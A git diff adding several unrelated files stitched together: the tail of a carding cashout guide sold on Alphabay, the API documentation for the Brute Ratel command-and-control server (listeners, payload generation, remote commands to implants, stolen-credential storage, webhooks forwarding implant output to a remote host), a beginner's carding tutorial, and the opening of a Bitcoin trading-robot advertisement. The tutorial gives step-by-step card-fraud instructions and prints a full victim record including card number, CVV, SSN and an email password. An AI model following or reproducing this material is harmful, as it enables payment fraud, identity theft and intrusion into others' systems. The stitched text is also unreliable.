+8) Tricks
+- If after the booking you will have only 1
+option : « payment in cash » the reason is
+that you have not been clever enough, so
+don’t forget to send some messages to
+others renters also with the owner of your
+fake flat (you ! ) during the booking.
+- You can also bypass the option payment in
+cash : make a distant booking of about 1
+
+month, this process is useful because it
+allows you to cashout the funds of your 1st
+booking.
+- The anon SIM cards may be useful if they
+need SMS verification (but not everytime, I
+needed it one time only)
+- The anon CC with IBAN attached may be
+VERY VERY VERY useful to cashout BIG
+amounts !
+-> Why ?
+ Because you will be able to
+Make fake bookings with big amounts
+without fraud because the owner of the
+CC is you, you will have to pay the fees of
+course but it would be very profitable
+and it will allow you to increase your
+scoring to 200%
+The 3 best ways to get anon mastercards
+(fakes ids of course) :
+
+https://goo.gl/epvLoD
+https://goo.gl/sF96Bm
+https://goo.gl/ORmLyx
+--------------------------------------------------------------------------
+Congratulations ! Now you know this easy method
+to cashout all CCs to BTC, please don’t forget to
+act as a real customer / renter to avoid suspicions,
+if you follow step by step your guide it will be easy
+for you to make $200 benefits everyday.
+Any more question ? Welcome !
+Finalize and leave a feedback at the same level of
+this guide ? Welcome !
+Let’s make money Baby
+PlentyOfCoins on Alphabay Market
diff --git a/api-ratel-war-room_pdf.md b/api-ratel-war-room_pdf.md
new file mode 100644
index 0000000..e4986c3
--- /dev/null
+++ b/api-ratel-war-room_pdf.md
@@ -0,0 +1,1026 @@
+# api-ratel-war-room
+
+
+---
+
+Brute Ratel Documentation
+Last Updated: Monday 16 January 2023
+Ratel Server
+Ratel server responses have some parameters which are common across all responses. These are:
+access, status and task. The access key specifies whether the current user’s access token is valid.
+The status key specifies the execution success status of the request. If the request was not executed
+either due to incorrect value or any other environmental reasons, the return value will be false, else
+true. The task key specifies the response is from which requested task. This can be helpful when
+querying multiple requests for parsing the appropriate response. Some requests will have the
+response under task id 24. This just means the response is a broadcast message which will be
+delivered to all connected users.
+Login (HTTP) – No Task ID
+Description HTTP Post request is required to get a token. This token should be used in a
+Websocket request for handler interaction. Task ID is not required.
+Parameters user Username
+pass Password
+Request {
+"creds": {
+"pass": "admin",
+"user": "admin"
+}
+}
+Response {
+"access": true,
+"is_admin": true,
+"status": true,
+"token": "5T7D3F8UCVOIAN2UE6AVCNLV8BHSFCT1"
+}
+Task 0: Authorization (Websocket)
+Description Validates authorization of cookie over a websocket session. Returns detailed
+server information.
+Parameters task: 0
+user: Username
+token: Token received from login
+Request {
+"creds": {
+"token": "5T7D3F8UCVOIAN2UE6AVCNLV8BHSFCT1",
+"user": "admin"
+},
+"task": 0
+}
+Response Large blob of server metadata containing server version, user details,
+commands available. The output is non-essential for automation purpose.
+
+Task 1: Logout (Websocket)
+Description Logs out existing user and disables user cookie
+Parameters task 1
+Request {
+"task": 1
+}
+Response {
+"access": false,
+"status": true,
+"task": 1,
+}
+Task 2: Create User (Websocket)
+Description Creates a new non-admin user
+Parameters task 2
+user Username of new user
+pass Password of new user
+Request {
+"create": {
+"pass": "ratel",
+"user": "ratel"
+},
+"task": 2
+}
+Response {
+"access": true,
+"status": true,
+"task": 24,
+"users": {
+"active": {
+"admin": "02-06-2022 17:36:18"
+},
+"inactive": {
+}
+}
+}
+
+Task 3: Delete User (Websocket)
+Description Deletes an existing user with all of user’s cookies and .permissions
+Parameters task 3
+delete Username to delete
+Request {
+"delete": "ratel",
+"task": 3
+}
+Response {
+"access": true,
+"status": true,
+"task": 24,
+"users": {
+"active": {
+"admin": "07-05-2020 08:44:33"
+},
+"inactive": {
+}
+}
+}
+Task 4: Reset User Password (Websocket)
+Description Resets a users password
+Parameters task 4
+user Username to reset
+pass New password for user
+Request {
+"k_user": {
+"pass": "newpass",
+"user": "ratel"
+},
+"task": 4
+}
+Response {
+"access": true,
+"status": true,
+"task": 24,
+"users": {
+"active": {
+"admin": "07-05-2020 08:44:33"
+},
+"inactive": {
+"ratel": "07-05-2020 09:07:33"
+}
+}
+}
+
+Task 5: List User (Websocket)
+Description Lists all users
+Parameters task 5
+Request {
+"task": 5
+}
+Response {
+"access": true,
+"status": true,
+"task": 5,
+"users": {
+"active": {
+"admin": "07-05-2020 09:17:44"
+},
+"inactive": {}
+}
+}
+Task 6: Create Listener (HTTP/DNS) (Websocket)
+
+Description Creates different types of listener
+Parameters task 6
+append This field contains the value to append the badger’s pos
+request in a malleable profile
+prepend This field contains the value to prepend the badger’s
+pos request in a malleable profile
+auth_count This field indicates the number of passwords to be set
+auth_type This field can be true or false. It indicates if auth is One
+Time Auth or Regular
+c2_authkeys This field can contain on or more set of listener keys.
+Badger authenticates to this key. If is_random field is
+true, this field is set automatically. If auth_count is more
+than one and is_random is set, this field is set
+automatically
+c2_uri List of URIs that badger will connect back to
+die_offline This field can be true or false. If the value is true, it
+means the badger should die if it is unable to connect to
+the C2, else vice versa.
+extra_headers This field contains a key value pair of header names and
+their values.
+host Network interface IP which will be binded for listening
+is_random If this field is true, c2_authkeys is set automatically
+listener_name Name of the listener
+os_type Type of payload: Current limited to windows
+port Port to listen on
+rotational_host This field can contain a list of IP/Domain/Redirector
+domain/Fronted domain seperated by commas
+useragent The useragent for the payload
+ssl True or false
+Request Random key for {
+Regular auth "listener": {
+"listener_name": "json-c2",
+"append": "\"}",
+"append_response": "\"}",
+"auth_count": 1,
+"auth_type": false,
+"c2_authkeys": [
+"abcd@123"
+],
+"c2_uri": [
+"en/ec2/pricing/",
+"?locale=en"
+],
+"die_offline": false,
+"empty_response": "{\"Info\":\"Ok\"}",
+"request_headers": {
+"content-type": "application/json",
+"referrer": "microsoft.com",
+
+"Host": "microsoft.com"
+},
+"response_headers": {
+"Server": "Apache/2.2.14 (Win32)",
+"X-Backend-Server":
+"developer2.webapp.scl3.mozilla.com",
+"X-Cache-Info": "not cacheable; meta data too
+large"
+},
+"host": "172.16.219.1",
+"is_random": true,
+"os_type": "windows",
+"port": "443",
+"prepend": "{\"channel\":\"",
+"prepend_response": "{\"Output\":\"",
+"rotational_host": "172.16.219.1",
+"ssl": true,
+"useragent": "Mozilla/5.0 (Windows NT 10.0;
+Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
+Chrome/90.0.4430.93 Safari/537.36",
+"sleep": 2,
+"jitter": 0,
+"obfsleep": "Pooling-0"
+},
+"task": 6
+}
+Custom key for {
+One Time Auth "listener": {
+"append": "\"}",
+"auth_count": 0,
+"auth_type": true,
+"c2_authkeys": [
+"abcd@123"
+],
+"c2_uri": [
+"test",
+"login",
+"bootstrap"
+],
+"die_offline": true,
+"extra_headers": {
+"content-type": "application/json",
+"referrer": "microsoft.com"
+},
+"host": "10.0.0.218",
+"is_random": false,
+"listener_name": "auto-869804a3",
+"os_type": "windows",
+"port": "443",
+"prepend": "{\"sample_json\":\"",
+"rotational_host":
+"do.skype.com,msvcrl.microsoft.com",
+"ssl": true,
+"useragent": "Mozilla/5.0 (Windows NT 10.0;
+Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
+Chrome/90.0.4430.93 Safari/537.36"
+},
+"task": 6
+}
+
+Multiple random {
+keys for One Time "listener": {
+Auth "append": "\"}",
+"auth_count": 6,
+"auth_type": true,
+"c2_authkeys": [],
+"c2_uri": [
+"test",
+"login",
+"bootstrap"
+],
+"die_offline": true,
+"extra_headers": {
+"content-type": "application/json",
+"referrer": "microsoft.com"
+},
+"host": "10.0.0.218",
+"is_random": true,
+"listener_name": "auto-869804a3",
+"os_type": "windows",
+"port": "443",
+"prepend": "{\"sample_json\":\"",
+"rotational_host":
+"do.skype.com,msvcrl.microsoft.com",
+"ssl": true,
+"useragent": "Mozilla/5.0 (Windows NT 10.0;
+Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
+Chrome/90.0.4430.93 Safari/537.36"
+},
+"task": 6
+}
+Response {
+"access": true,
+"listeners": {
+"auto-869804a3": {
+"append": "\"}",
+"auth_count": 1,
+"auth_type": false,
+"c2_authkeys": [
+"JKVM34MH5KB0LMQE"
+],
+"c2_uri": [
+"test",
+"login",
+"bootstrap"
+],
+"die_offline": true,
+"extra_headers": {
+"content-type": "application/json",
+"referrer": "microsoft.com"
+},
+"host": "10.0.0.218",
+"is_random": true,
+"os_type": "windows",
+"port": "443",
+"prepend": "{\"sample_json\":\"",
+"rotational_host":
+"do.skype.com,msvcrl.microsoft.com",
+"ssl": true,
+
+"useragent": "Mozilla/5.0 (Windows NT 10.0; Win64;
+x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93
+Safari/537.36"
+}
+},
+"status": true,
+"task": 24
+}
+Task 7: Stop Listener (Websocket)
+Description Stop a running listener with the listener name
+Parameters task 7
+listener Name of the listener to stop
+Request {
+"listener": "auto-869804a3",
+"task": 7
+}
+Response {
+"access": true,
+"status": true,
+"task": 7
+}
+
+Task 8: List Listener (Websocket)
+Description Lists running listeners
+Parameters task 8
+Request {
+"task": 8
+}
+Response {
+"access": true,
+"listeners": {
+"auto-869804a3": {
+"append": "\"}",
+"auth_count": 1,
+"auth_type": false,
+"c2_authkeys": [
+"JKVM34MH5KB0LMQE"
+],
+"c2_uri": [
+"test",
+"login",
+"bootstrap"
+],
+"die_offline": true,
+"extra_headers": {
+"content-type": "application/json",
+"referrer": "microsoft.com"
+},
+"host": "10.0.0.218",
+"is_random": true,
+"os_type": "windows",
+"port": "443",
+"prepend": "{\"sample_json\":\"",
+"rotational_host":
+"do.skype.com,msvcrl.microsoft.com",
+"ssl": true,
+"useragent": "Mozilla/5.0 (Windows NT 10.0; Win64;
+x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93
+Safari/537.36"
+}
+},
+"status": true,
+"task": 8
+}
+
+Task 9: Host File On Listener (Websocket)
+Description Host a new file on the server
+Parameters task 9
+buffer Base64 encoded content of file to host
+listener_name Listener to modify
+mime_type Custom mime-type for hosted file
+uri URI to add (name of the file/uri which will be
+accessed)
+Request Host a file to server {
+"listener_uri": {
+"buffer": "SGVsbG8gd29ybGQK",
+"listener_name": "auto-869804a3",
+"mime_type": "text/plain",
+"uri": "test.txt"
+},
+"task": 9
+}
+Response {
+"access": true,
+"listeners": {
+"auto-869804a3": {
+"append": "\"}",
+"auth_count": 1,
+"auth_type": false,
+"c2_authkeys": [
+"abcd@123"
+],
+"c2_uri": [
+"en/ec2/pricing/",
+"?locale=en"
+],
+"die_offline": false,
+"extra_headers": {
+"content-type": "application/json"
+},
+"host": "172.16.219.1",
+"is_random": true,
+"os_type": "windows",
+"port": "443",
+"prepend": "{\"channel\":\"",
+"rotational_host": "172.16.219.1",
+"ssl": true,
+"useragent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)
+AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93
+Safari/537.36"
+}
+},
+"status": true,
+"task": 24
+}
+
+Task 10: Stop Hosted File On Listener (Websocket)
+Description Host a file on a new URI
+Parameters task 10
+c2_uri Listener name and URI path to remove seperated by a
+slash
+Request {
+"hosted": "auto-869804a3/test.txt"
+"task": 10
+}
+Response {
+"access": true,
+"hosted": {
+},
+"status": true,
+"task": 10
+}
+Task 11: List Hosted Files On Listener (Websocket)
+Description Show hosted files
+Parameters task 11
+Request {
+"task": 11
+}
+Response {
+"access": true,
+"hosted": {
+"auto-869804a3/test.txt": "text/plain"
+},
+"status": true,
+"task": 11
+}
+
+Task 13: PsExec Configuration (Websocket)
+Description Show or manage PsExec configuration
+Parameters task 13
+type This field can contain ‘psexec_config’ or ‘update’
+depending on what task is being performed
+svc_desc Name of the description for the service when building the
+service for the ‘psexec’ command
+svc_name Name of the service to build when using the ‘psexec’
+command
+Request View psexec {
+configuration "task": 13,
+"type": "psexec_config"
+}
+Configure {
+psexec "svc_desc": "test description for psexec badger service",
+"svc_name": "Badger Service",
+"task": 13,
+"type": "update"
+}
+Response View Response {
+"access": true,
+"psexec_config": {
+"svc_desc": "Manages universal application
+core process that in Windows 8 and continues in Windows
+10. It is used to determine whether universal apps installed
+from the Windows Store are declaring all of their
+permissions, like being able to access your telemetry,
+location or microphone. It helps to transact records of your
+universal apps with the trust and privacy settings of user.",
+"svc_name": "TransactionBrokerService"
+},
+"status": true,
+"task": 13,
+"type": "psexec_config"
+}
+Modify PsExec {
+"access": true,
+"status": true,
+"task": 13,
+"type": "update"
+}
+
+Task 14: Manage Compromised Credentials (Websocket)
+Description Add or remove credentials
+Parameters task 14
+crednote Credentials notes
+credpass Password
+credsrc Source of credentials
+creduser Username
+Request Add Credentials {
+"add_creds": {
+"crednote": "some notes",
+"credpass": "P@ssw0rd",
+"credsrc": "some text file",
+"creduser": "brute"
+},
+"task": 14
+}
+Remove Credentials {
+"del_creds": {
+"crednote": "from host xyz",
+"credpass": "pass123",
+"credsrc": "mimikatz",
+"creduser": "ninja"
+},
+"task": 14
+}
+Response Add Credentials {
+"access": true,
+"credentials": [
+{
+"crednote": "some notes",
+"credpass": "P@ssw0rd",
+"credsrc": "some text file",
+"creduser": "brute"
+}
+],
+"status": true,
+"task": 24
+}
+Remove Credentials {
+"access": true,
+"credentials": [
+],
+"status": true,
+"task": 24
+}
+
+Task 15: List Compromised Credentials (Websocket)
+Description List all compromised credentials
+Parameters task 15
+Request {
+"task": 15
+}
+Response {
+"access": true,
+"credentials": [
+{
+"crednote": "some notes",
+"credpass": "P@ssw0rd",
+"credsrc": "some text file",
+"creduser": "brute"
+}
+],
+"status": true,
+"task": 15
+}
+Task 16: List All Badgers (Websocket)
+Description List all connected badgers
+Parameters task 16
+Request {
+"task": 16
+}
+Response {
+"access": true,
+"badgers": {
+"b-0": {
+"b_arch": "x64",
+"b_bld": "18363",
+"b_c2": "https://172.16.219.1:443",
+"b_c2_id": "auto-869804a3",
+"b_cookie":
+"VUHMA3QT10CBCK815D6KQ0VMGBRBE3R0",
+"b_h_name": "DESKTOP-G15FRLS",
+"b_l_ip": "172.16.219.1",
+"b_p_name": "Z:\\documents\\badger_x64.exe",
+"b_pid": "9144",
+"b_seen": "02-06-2022 19:31:28",
+"b_uid": "vendetta",
+"b_wver": "x64/10.0",
+"dead": false,
+"is_pvt": false,
+"pipeline": "Direct",
+"pvt_master": ""
+}
+},
+"status": true,
+"task": 16
+}
+
+Task 17: Send Badger Command (Websocket)
+Description Send a command to badger
+Parameters task 17
+badger Badger id
+cmd Command to send (All arguments are seperated by a space.
+Local PE files (C#/powershell) are sent as base64 encoded
+buffers
+Request {
+"bgr_cmd": {
+"badger": "b-0",
+"cmd": "pwd"
+},
+"task": 17
+}
+Response {
+"access": true,
+"status": true,
+"task": 17
+}
+Task 18: Send Bulk Badger Query (Websocket)
+Description Send command to all badgers connected to a specific listener
+Parameters task 18
+cmd Command which will be sent to all the badgers in a listener
+listener Name of the listener to query in bulk
+Request {
+"blkconfig": {
+"cmd": "pwd",
+"listener": "json-c2"
+},
+"task": 18
+}
+Response {
+"access": true,
+"badger_count": "4",
+"status": true,
+"task": 18
+}
+
+Task 19: List Command Queue (Websocket)
+Description List queued commands for badgers
+Parameters task 19
+Request {
+"task": 19
+}
+Response {
+"b-0": [
+"pwd",
+"pwd"
+],
+"b-1": [
+"pwd"
+],
+"b-2": [
+"pwd"
+],
+"b-3": [
+"pwd"
+]
+}
+Task 20: Clear Badger Queue (Websocket)
+Description Clear all queued commands for a badger
+Parameters task 20
+badger Badger id
+Request {
+"bgr_rst": {
+"badger": "b-0"
+},
+"task": 20
+}
+Response {
+"access": true,
+"status": true,
+"task": 20
+}
+
+Task 21: Change Listener Password (Websocket)
+Description Change Listener Password
+Parameters task 21
+listener Listener whose password is to be changed
+pass New password. This can be a list of comma seperated values,
+if multiple one time passwords need to be added.
+Request {
+"set": {
+"listener": "primary-c2",
+"pass": [
+"abcd@123"
+]
+},
+"task": 21
+}
+Response {
+"access": true,
+"status": true,
+"task": 21
+}
+Task 22: List Server Configuration (Websocket)
+Description List configuration for the whole server. This can be used to create a new C2
+profile while starting the ratel server
+Parameters task 22
+Request {
+"task": 22
+}
+Response A large blob of full server metadata
+
+Task 30: Create/Modify Payload Profile (Websocket)
+Description The default task is to create a payload profile. If a profile already exists under
+the same name, then it is overwritten with the updated profile
+Parameters task 30
+payload_config Contains a key value pair of new payload profiles to add,
+key being the name of the profile, and value containing
+another json object
+append This field contains the value to append the badger’s pos
+request in a malleable profile
+c2_auth This field contain the authentication key required to
+connect to the listener
+c2_uri List of URIs that badger will connect back to
+die_offline This field can be true or false. If the value is true, it
+means the badger should die if it is unable to connect to
+the C2, else vice versa.
+extra_headers This field contains a key value pair of header names and
+their values.
+host This field can contain a list of IP/Domain/Redirector
+domain/Fronted domain seperated by commas. For a
+TCP payload, this can be a single IP or multiple IP
+addresses.
+port Port to listen on
+prepend This field contains the value to prepend the badger’s pos
+request in a malleable profile
+ssl True or false
+type Type can be HTTP, SMB or TCP depending on the type
+of profile being added
+useragent The useragent for the payload
+smb_pipe Name of the SMB pipe (only for SMB payloads)
+show Should be false unless GUI is being used
+Request Add/Modify HTTP {
+profile "payload_config": {
+"test-profile": {
+"append": "\"}",
+"append_response": "\"}",
+"auth_count": 1,
+"auth_type": false,
+"c2_authkeys": [
+"abcd@123"
+],
+"c2_uri": [
+"en/ec2/pricing/",
+"?locale=en"
+],
+"die_offline": false,
+"empty_response": "{\"Info\":\"Ok\"}",
+"request_headers": {
+"content-type": "application/json",
+"referrer": "microsoft.com",
+"Host": "microsoft.com"
+},
+
+"response_headers": {
+"Server": "Apache/2.2.14 (Win32)",
+"X-Backend-Server":
+"developer2.webapp.scl3.mozilla.com",
+"X-Cache-Info": "not cacheable; meta data too
+large"
+},
+"host": "172.16.219.1",
+"is_random": true,
+"os_type": "windows",
+"port": "443",
+"prepend": "{\"channel\":\"",
+"prepend_response": "{\"Output\":\"",
+"rotational_host": "172.16.219.1",
+"ssl": true,
+"useragent": "Mozilla/5.0 (Windows NT 10.0;
+Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
+Chrome/90.0.4430.93 Safari/537.36",
+"sleep": 2,
+"jitter": 0,
+"obfsleep": "Pooling-0"
+}
+},
+"show": true,
+"task": 30
+}
+Add/Modify SMB {
+Profile "payload_config": {
+"main_smb2": {
+"c2_auth": "abcd@123",
+"smb_pipe": "\\\\.\\pipe\\mynamedpipe",
+"type": "SMB",
+"obfsleep": "Pooling-0"
+}
+},
+"show": true,
+"task": 30
+}
+Add/Modify TCP {
+Profile "payload_config": {
+"main_tcp2": {
+"c2_auth": "abcd@123",
+"host": "127.0.0.1",
+"port": "10000",
+"type": "TCP",
+"obfsleep": "Pooling-0"
+}
+},
+"show": true,
+"task": 30
+}
+Response Json response containing the profile which was successfully added
+
+Task 31: View Payload Configuration (Websocket)
+Description View all payload profiles
+Parameters task 31
+edit This field should be false if a profile is being view. If an
+existing profile is being added, this will be true and the
+same information sent in Task 30 can be sent over here.
+Request {
+"edit": false,
+"task": 31
+}
+Response {
+"access": true,
+"edit": false,
+"payload_config": {
+"auto-869804a3": {
+"append": "\"}",
+"c2_auth": "abcd@123",
+"c2_uri": [
+"en/ec2/pricing/",
+"?locale=en"
+],
+"die_offline": false,
+"extra_headers": {
+"content-type": "application/json"
+},
+"host": "172.16.219.1",
+"port": "443",
+"prepend": "{\"channel\":\"",
+"ssl": true,
+"type": "HTTP",
+"useragent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)
+AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93
+Safari/537.36"
+},
+"main_smb": {
+"c2_auth": "abcd@123",
+"smb_pipe": "\\\\.\\pipe\\mynamedpipe",
+"type": "SMB"
+},
+"main_tcp": {
+"c2_auth": "abcd@123",
+"host": "127.0.0.1",
+"port": "10000",
+"type": "TCP"
+}
+},
+"status": true,
+"task": 31
+}
+
+Task 32: Delete Payload Profile (Websocket)
+Description Deletes an existing payload profile
+Parameters task 32
+payload_config Name of the payload profile
+Request {
+"payload_config": "test-profile",
+"task": 32
+}
+Response Remaining json profiles or an empty json profile if no more profiles exist
+Task 36: Generate Payload (Websocket)
+Description Build a tcp/smb/http/dns payload
+Parameters task 36
+payload_arch This field contains 0 or 1. 0 means arch type x86,
+whereas 1 means x64
+payload_config_name The name of the config on the server from which the
+payload needs to be generated
+payload_type The payload types be the following:
+0: ret shellcode
+1: rtl shellcode
+2: wait shellcode
+4: dll
+5: service exe
+7: stealth ret
+8. stealth rtl
+9. stealth wait
+10. stealth service exe
+The response will be base64 encoded
+save_path The local path where the payload needs to be saved
+svc_desc The service description (optional and only valid for
+service payload_type)
+svc_name The service name (optional and only valid for service
+payload_type)
+Request {
+"payload_arch": 1,
+"payload_config_name": "auto-json-c2",
+"payload_type": 0,
+"save_path": "/home/paranoidninja/Documents/badger_x64_ret.bin",
+"svc_desc": "NA",
+"svc_name": "NA",
+"task": 36
+}
+Response {
+"access": true,
+"payload_dat": "TVqQAAMAAAAEAAAA",
+"ptype": 2,
+"save_path": "/home/paranoidninja/Documents/badger_x64_ret.bin",
+"status": true,
+"task": 36
+}
+
+Task 40: Enable Staging on HTTP Listener (Websocket)
+Description Enable HTTP Staging
+Parameters task 40
+build false
+listener_name Json-c2 (name of the listener)
+Request {
+"task": 40,
+"build": false,
+"listener_name": "json-c2"
+}
+Response Returns staging listener name and payload configuration of the stage
+enabled
+Task 41: Disable Staging on HTTP Listener (Websocket)
+Description Disable HTTP Staging
+Parameters task 41
+remove true
+listener_name Json-c2 (name of the listener)
+Request {
+"task": 41,
+"listener_name": "json-c2",
+"remove": true
+}
+Response {
+"access": true,
+"listener_name": "json-c2",
+"remove": true,
+"status": true,
+"task": 41
+}
+
+Task 45: Manage WebHooks (Websocket)
+Description Start or stop a configured webhook. Webhooks can be used to forward
+badger output (either just the initial access or fully detailed outputs to remote
+servers, where automation can be performed by parsing found strings in the
+output)
+Parameters task 45
+webhook Contains a key value pair of the settings for webhook to be
+configured
+badger_init If this is true, the initial connection of badger and badger’s
+metadata will be forwarded to the user’s server
+badger_log If this is true, all of badger’s output will be forwarded to the
+user’s server
+listener The name of the listener on which the webhook needs to
+be enabled
+start This field specified whether the webhook needs to be
+started or stopped
+webhook_host The host on which the logs/metadata of the badger needs
+to be forwarded
+Request Enable webhook {
+"task": 45,
+"webhook": {
+"badger_init": true,
+"badger_log": true,
+"listener": "json-c2",
+"start": true,
+"webhook_host": "https://evasionlabs.com"
+}
+}
+Disable webhook {
+"task": 45,
+"webhook": {
+"listener": "json-c2",
+"stop": true
+}
+}
+Response Enable webhook {
+"access": true,
+"listener": "json-c2",
+"status": true,
+"task": 45
+}
+Disable webhook {
+"access": true,
+"status": true,
+"task": 45
+}
+
+Task 46: Switch Badger Profile (Websocket)
+Description Change badger’s malleable profile. Make note the badger needs to exist for
+this to work
+Parameters task 46
+profile Payload profile name
+bgrlist An array of badgers whose profile
+needs to be changed
+Request {
+"task": 46,
+"profile": "auto-json-c2",
+"bgrlist": [
+"b-0", "b-1"
+]
+}
+Response {
+"access":true,
+"status":true,
+"task":46
+}
+Task 58: Add Note To Badger (Websocket)
+Description Add note against a badger
+Parameters task 58
+badger The badger ID (b-0)
+note The note to be added
+Request {
+"task": 58,
+"badger": "b-0",
+"note": "sample note for badger zero"
+}
+Response {
+"access":true,
+"status":true,
+"task":58
+}
diff --git a/beginnerscarding tutorial_txt.md b/beginnerscarding tutorial_txt.md
new file mode 100644
index 0000000..bbbd4d5
--- /dev/null
+++ b/beginnerscarding tutorial_txt.md
@@ -0,0 +1,98 @@
+# beginnerscarding tutorial
+
+
+---
+
+First lets start on what you need:
+
+1. Computer, macbook, laptop, etc...
+
+2. A virtual private network (VPN) extends a private network across a public network, such as the Internet. It enables a computer to send and receive data across shared or public networks as if it was directly connected to the private network, while benefitting from the functionality, security and management policies of the private network.[1] This is done by establishing a virtual point-to-point connection through the use of dedicated connections, encryption, or a combination of the two.
+( You got a lot of free vpn software on internet, or trial)
+Here is link where you can get VPN software for free or premium ones
+
+download - VPN
+
+3. RPD - Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft, which provides a user with a graphical interface to connect to another computer over a network connection. The user employs RDP client software for this purpose, while the other computer must run RDP server software.
+Clients exist for most versions of Microsoft Windows (including Windows Mobile), Linux, Unix, Mac OS X, iOS, Android, and other modern operating systems. RDP servers are built into Windows operating systems; an RDP server for Linux also exists. By default, the server listens on TCP port 3389.
+Microsoft currently refers to their official RDP server software as Remote Desktop Services, formerly "Terminal Services". Their official client software is currently referred to as Remote Desktop Connection, formerly "Terminal Services Client"
+
+You can connect to RDP by clicking on start menu - remote desktop connection - then type victims ip address. Example 74.7.42.89,click connect, now it will pop up screen asking for password and username which is in this case: User name: Shipping Password shipping1. Now click ok, and you will get access to Remote Desktop Connection - which means you are connected to someone computer and you will buy stuff from victims computer. Not YOURS!
+
+4. Socks 5 SOCKet Secure (SOCKS) is an Internet protocol that routes network packets between a client and server through a proxy server. SOCKS5 additionally provides authentication so only authorized users may access a server. Practically, a SOCKS server proxies TCP connections to an arbitrary IP address, and provides a means for UDP packets to be forwarded. SOCKS performs at Layer 5 of the OSI model (the ******* layer, an intermediate layer between the presentation layer and the transport layer).
+
+You can get socks for free http://hidemyass.com/proxy-list/,
+or you can buy fresh witch i reccomend
+
+BUY FROM HERE => SOCKS 5
+
+How to use socks5? Example of socks4/socks5 are 75.119.127.189:36871
+Socks5 are very easy to use via Mozilla Firefox. First open Mozilla Firefox, next step
+is firefox - options - advanced - network - connections - settings. Now the screen will pop up varius options like : 1. No proxy; 2.Auto Detect; 3.Use system proxy; 4. Manual proxy configuration. You mark 4. Manual proxy configuration. Now type in socks host IP you have, example Socks Host: 75.119.127.189 Port: 1080. Press ok and you are connected to secure socks5. Will explain more when we start carding.
+
+5. Victims credit card, you can get a lot of free credit cards here on ABH, or you can buy one from variuos cvv shops that can be find on internet. Example off victims credit card:
+First Name : harvey
+Middle Name : james
+Last Name : menehan
+Spouse Name :
+Father Name :
+Billing Address : 9006 peppertree circle
+City : wichita
+State : KS
+Zip Code : 67226
+Country : US
+Phone Number : 3166342050
+Credit Card Information :
+*********
+Card Type : Credit
+Credit Card Number : 5102 4129 0001 1332
+Exp. Date : 6/June / 2016
+Name On Card : H. James Menehan
+Cvv2 : 474
+Mother Maiden Name : penny
+Social Security Number : 515 16 4160
+Birth Day : 28
+Birth Month : 02
+Birth Year : 1926
+Account Information :
+*******
+AOL ID : hjimdoc@aol.com
+Password : Jm6227mh
+
+Note: This is only example off victims credit card, you dont need all this information to card like DOB (date of birth) SSN (social security number) etc. Some sites ask only for card numbers, exp date and cvv2.
+
+Now that you have all this above, lets start carding
+
+Lets say we want free phone like Samsung S4, IPHONE 5, Sony Z etc...
+First of all i want to recommend a website shop from your country. Why? Because you dont need to wait a lot for you package. In my country they delliver in 2 days, most 3 days. I am sure there is a lot of cell phones shops in any country. Use google and find it.
+
+There are two types of shops, VBV and NON VBV:
+
+VBV is a Verified by Visa, an online security system for credit card transactions. Which means you need to provide a card knowing a lot of victim credit card information such as DOB (date of birth), SSN (social security numbers), Secure password witch cc owner use for online purchase. You can check on shop is there a VBV VERIFIED BY VISA ICON on home page.
+
+NON VBV is not verifired by visa card, you can buy anything with non vbv cards without going thru 3d verification process.
+
+We leave now this for later.
+
+1. Connect to your vpn software and chose ip - country you want.
+
+2. Connect to RPD ( Remote Destkop connection), must be same country (IP), state as card holder Address. Do not forget that.
+
+3. Now from your RPD, connect to socks5 via mozzila firefox, example 97.77.96.226 34539 United States, MUST BE SAME ASS CARD HOLDER: COUNTRY, STATE, CITY!
+
+4. When you done all that, create email with same name as credit card holder name, same address, same city, and everything. Or if you got email access thats whould be a lot better .
+
+5. Go to your website shop you want to card. ( dont be lazy and find a good yours private shop from your country or any other that ships worldwide).
+
+6. Register with credit card holder information, name, country, city, address, and email you made one just for this ORDER.
+
+7. Add a shipping address, some sites dont allow to ship to diffrent address but there is planty of shops witch do. Shipping address is where package will be dellivered. Which means you provide your address, girlfriend address, friend address, to your drop etc.
+
+8. Select product you want, and click on check out, now it will ask for you know, how you will pay. Choose credit card, and type victims credit card numbers and other information needed.
+
+9. Click order now, and i am sure 100000000000% they will confirm your order via email or you will get track your order on website, after pressing order.
+(note that some sites need phone verification, but you can always buy phone number, confirm your order, and destroy it after they ship your item) its how i do it.
+
+10. Wait for order to arrive to your shipping address, I personally use FEDEX, EURO EXPRESS, CITY EXPRESS. When they arrive they call me, and i can say difrent
+adress where i want to pick up my order. Sign in with fake name you provided and run xDDDDDDDDD. Just joking. Be a calm down like you just stole 100 MILION US DOLLARS and take the package. Use item for you
+Categories: Carding
diff --git a/bitcoin_pioneer_pdf.md b/bitcoin_pioneer_pdf.md
new file mode 100644
index 0000000..950b9a8
--- /dev/null
+++ b/bitcoin_pioneer_pdf.md
@@ -0,0 +1,842 @@
+# bitcoin pioneer
+
+
+---
+
+Get Your Automated Bitcoin Trading Robot at www.btcrobot.com
+
+Created just 3 years ago, the new fully independent currency
+BITCOIN is about to take over the world!
+And if you jump in fast, you can be one of those who’ll rip all the
+benefits. Remember, the early bird catches the worm
+Today you are among the first Pioneers, the guys who will be on the
+edge of the new technology and rip all the benefits! Take advantage
+of this opportunity before it’s too late!
+This book was created first only for our inhouse use with the most
+important links about Bitcoin to help you get started fast with
+Bitcoin before the rest of the world!
+Enjoy!
+P. S. Remember if you plan to profit, you need to use the best
+automated tools possible. This is where Bitcoin robot, the first fully
+automated trading robot comes to your help! You can download it at
+www.BtcRobot.com
+Yours,
+BtcRobot.com team
+
+What are cryptocurrencies?
+A cryptocurrency is a type of digital currency that is based
+on cryptography, you know: public, private keys, signing,
+SSL, DES, etc. Why? Well, for the usual reasons that you
+choose to encrypt your own data. Confidentiality mixed
+with the security to making money difficult to counterfeit.
+Since cryptocurrencies often exhibit a distributed nature,
+asymmetric cryptography (i.e. public and private keys) is
+often preferred over single key schemes.
